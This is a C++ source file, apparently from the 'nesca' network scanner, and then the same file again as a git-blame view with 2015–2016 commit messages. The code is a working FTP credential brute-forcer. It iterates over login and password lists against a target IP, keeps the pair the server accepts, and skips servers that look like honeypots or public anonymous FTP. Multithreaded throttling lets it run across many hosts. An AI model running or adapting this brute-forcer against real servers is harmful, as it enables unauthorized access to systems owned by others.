nesca/FTPAuth.cpp

#include "FTPAuth.h"
#include "FileUpdater.h"

bool FTPA::checkOutput(const string *buffer) {
    if(Utils::ustrstr(*buffer, "230") != -1) {

        return true;
    }

    return false;
}

lopaStr FTPA::FTPBrute(const char *ip, const int port, PathStr *ps) {
    string buffer;
    string lpString;
    lopaStr lps = {"UNKNOWN", "", ""};

	int res = 0;
	int passCounter = 0;
	int rowIndex = -1;

    char login[32] = {0};
    char pass[32] = {0};

	for (int i = 0; i < MaxFTPLogin; ++i)
    {
        if(!globalScanFlag) return lps;
		FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready; });
		strcpy(login, ftpLoginLst[i]);
		if (strlen(login) <= 1) continue;

		for (int j = 0; j < MaxFTPPass; ++j)
        {
            if(!globalScanFlag) return lps;
			FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready; });
			strcpy(pass, ftpPassLst[j]);
			if (strlen(pass) <= 1) continue;

            lpString = string(login) + ":" + string(pass);
			
			Connector con;
			res = con.nConnect(ip, port, &buffer, NULL, NULL, &lpString);
			if (res == -2) {
				rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex);
				return lps;
			}
			else if (res != -1) {
				if (buffer.find("syslog") != -1 || buffer.find("CFG-PAGE") != -1) {
					if (gNegDebugMode) {
						stt->doEmitionDebugFoundData("Ignoring " + QString(ip) + " (syslog or CFG-PAGE)");
					}
					return lps;
				}
				ps->directoryCount = std::count(buffer.begin(), buffer.end(), '\n');

				if (3 == ps->directoryCount) {
					if (-1 != buffer.find("pub") || -1 != buffer.find("incoming")) {
						if (gNegDebugMode) {
							stt->doEmitionDebugFoundData("Ignoring " + QString(ip) + " (pub or incoming)");
						}
						return lps;
					}
				}

				if (!globalScanFlag) return lps;
				strcpy(lps.login, login);
				strcpy(lps.pass, pass);

				rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK", rowIndex);
				
				return lps;
			};

			rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxFTPPass*MaxFTPLogin)) * 100).mid(0, 4) + "%", rowIndex);
			++passCounter;
            Sleep(50);
        }
    }

	rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex);
    return lps;
}

lopaStr FTPA::FTPLobby(const char *ip, const int port, PathStr *ps) {
    if(gMaxBrutingThreads > 0) {
        while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000);

		++baCount;
		++BrutingThrds;
		stt->doEmitionUpdateArc(gTargets);
		const lopaStr &lps = FTPBrute(ip, port, ps);
		--BrutingThrds;

        return lps;
    } else {
        lopaStr lps = {"UNKNOWN", "", ""};
        return lps;
    }
}
FTP & BA refactoring 2015-03-16 14:29:34 +00:00			`#include "FTPAuth.h"`
Fixed ignoing of first string in negative list. 2015-03-27 10:38:38 +00:00			`#include "FileUpdater.h"`
FTP & BA refactoring 2015-03-16 14:29:34 +00:00
			`bool FTPA::checkOutput(const string *buffer) {`
Partial refactoring of filter and neg-file module. 2015-04-16 11:51:51 +00:00			`if(Utils::ustrstr(*buffer, "230") != -1) {`
FTP & BA refactoring 2015-03-16 14:29:34 +00:00
			`return true;`
			`}`

			`return false;`
			`}`

Minor refactorings 2015-03-23 13:54:40 +00:00			`lopaStr FTPA::FTPBrute(const char ip, const int port, PathStr ps) {`
FTP & BA refactoring 2015-03-16 14:29:34 +00:00			`string buffer;`
			`string lpString;`
Threadpool refactoring. 2015-04-04 12:43:22 +00:00			`lopaStr lps = {"UNKNOWN", "", ""};`
FTP & BA refactoring 2015-03-16 14:29:34 +00:00
not-a-single-fcuk-version 2015-03-22 00:43:15 +00:00			`int res = 0;`
Added FTP/BA progress info. 2015-03-22 10:13:17 +00:00			`int passCounter = 0;`
Shuffle visualizer 2015-08-07 22:37:28 +00:00			`int rowIndex = -1;`
FTP & BA refactoring 2015-03-16 14:29:34 +00:00
- 2016-02-28 16:07:10 +00:00			`char login[32] = {0};`
Auto file update carcass 2015-03-24 14:29:27 +00:00			`char pass[32] = {0};`

Shuffle visualizer 2015-08-07 22:37:28 +00:00			`for (int i = 0; i < MaxFTPLogin; ++i)`
FTP & BA refactoring 2015-03-16 14:29:34 +00:00			`{`
			`if(!globalScanFlag) return lps;`
Shuffle visualizer 2015-08-07 22:37:28 +00:00			`FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready; });`
			`strcpy(login, ftpLoginLst[i]);`
			`if (strlen(login) <= 1) continue;`
FTP & BA refactoring 2015-03-16 14:29:34 +00:00
Shuffle visualizer 2015-08-07 22:37:28 +00:00			`for (int j = 0; j < MaxFTPPass; ++j)`
FTP & BA refactoring 2015-03-16 14:29:34 +00:00			`{`
			`if(!globalScanFlag) return lps;`
Shuffle visualizer 2015-08-07 22:37:28 +00:00			`FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready; });`
			`strcpy(pass, ftpPassLst[j]);`
			`if (strlen(pass) <= 1) continue;`
Auto file update carcass 2015-03-24 14:29:27 +00:00
FTP brute fixed. NPE on restart fixed. 2016-04-09 21:16:03 +00:00			`lpString = string(login) + ":" + string(pass);`
not-a-single-fcuk-version 2015-03-22 00:43:15 +00:00
Crash fix(?) + fake 401-error fix. 2015-04-28 23:27:54 +00:00			`Connector con;`
FTP fix 2016-01-20 17:53:41 +00:00			`res = con.nConnect(ip, port, &buffer, NULL, NULL, &lpString);`
Shuffle visualizer 2015-08-07 22:37:28 +00:00			`if (res == -2) {`
- 2016-02-28 16:07:10 +00:00			`rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex);`
Shuffle visualizer 2015-08-07 22:37:28 +00:00			`return lps;`
			`}`
not-a-single-fcuk-version 2015-03-22 00:43:15 +00:00			`else if (res != -1) {`
ftp fixes 2016-04-16 17:47:33 +00:00			`if (buffer.find("syslog") != -1 \|\| buffer.find("CFG-PAGE") != -1) {`
			`if (gNegDebugMode) {`
			`stt->doEmitionDebugFoundData("Ignoring " + QString(ip) + " (syslog or CFG-PAGE)");`
			`}`
			`return lps;`
			`}`
not-a-single-fcuk-version 2015-03-22 00:43:15 +00:00			`ps->directoryCount = std::count(buffer.begin(), buffer.end(), '\n');`
Shuffle visualizer 2015-08-07 22:37:28 +00:00
ftp fixes 2016-04-16 17:47:33 +00:00			`if (3 == ps->directoryCount) {`
			`if (-1 != buffer.find("pub") \|\| -1 != buffer.find("incoming")) {`
			`if (gNegDebugMode) {`
			`stt->doEmitionDebugFoundData("Ignoring " + QString(ip) + " (pub or incoming)");`
			`}`
			`return lps;`
			`}`
			`}`

			`if (!globalScanFlag) return lps;`
			`strcpy(lps.login, login);`
			`strcpy(lps.pass, pass);`

- 2016-02-28 16:07:10 +00:00			`rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK", rowIndex);`
Shuffle visualizer 2015-08-07 22:37:28 +00:00
not-a-single-fcuk-version 2015-03-22 00:43:15 +00:00			`return lps;`
			`};`
Added FTP/BA progress info. 2015-03-22 10:13:17 +00:00
- 2016-02-28 16:07:10 +00:00			`rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxFTPPassMaxFTPLogin)) 100).mid(0, 4) + "%", rowIndex);`
Shuffle visualizer 2015-08-07 22:37:28 +00:00			`++passCounter;`
			`Sleep(50);`
FTP & BA refactoring 2015-03-16 14:29:34 +00:00			`}`
			`}`

- 2016-02-28 16:07:10 +00:00			`rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex);`
FTP & BA refactoring 2015-03-16 14:29:34 +00:00			`return lps;`
			`}`

Minor refactorings 2015-03-23 13:54:40 +00:00			`lopaStr FTPA::FTPLobby(const char ip, const int port, PathStr ps) {`
Brute-disabling option added 2015-04-02 12:33:49 +00:00			`if(gMaxBrutingThreads > 0) {`
			`while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000);`
FTP & BA refactoring 2015-03-16 14:29:34 +00:00
Threadpool refactoring. 2015-04-04 12:43:22 +00:00			`++baCount;`
			`++BrutingThrds;`
Multiple fixes, QLikView added. 2016-01-24 19:03:28 +00:00			`stt->doEmitionUpdateArc(gTargets);`
Threadpool refactoring. 2015-04-04 12:43:22 +00:00			`const lopaStr &lps = FTPBrute(ip, port, ps);`
			`--BrutingThrds;`
FTP & BA refactoring 2015-03-16 14:29:34 +00:00
Brute-disabling option added 2015-04-02 12:33:49 +00:00			`return lps;`
			`} else {`
Shuffle visualizer 2015-08-07 22:37:28 +00:00			`lopaStr lps = {"UNKNOWN", "", ""};`
Brute-disabling option added 2015-04-02 12:33:49 +00:00			`return lps;`
			`}`
FTP & BA refactoring 2015-03-16 14:29:34 +00:00			`}`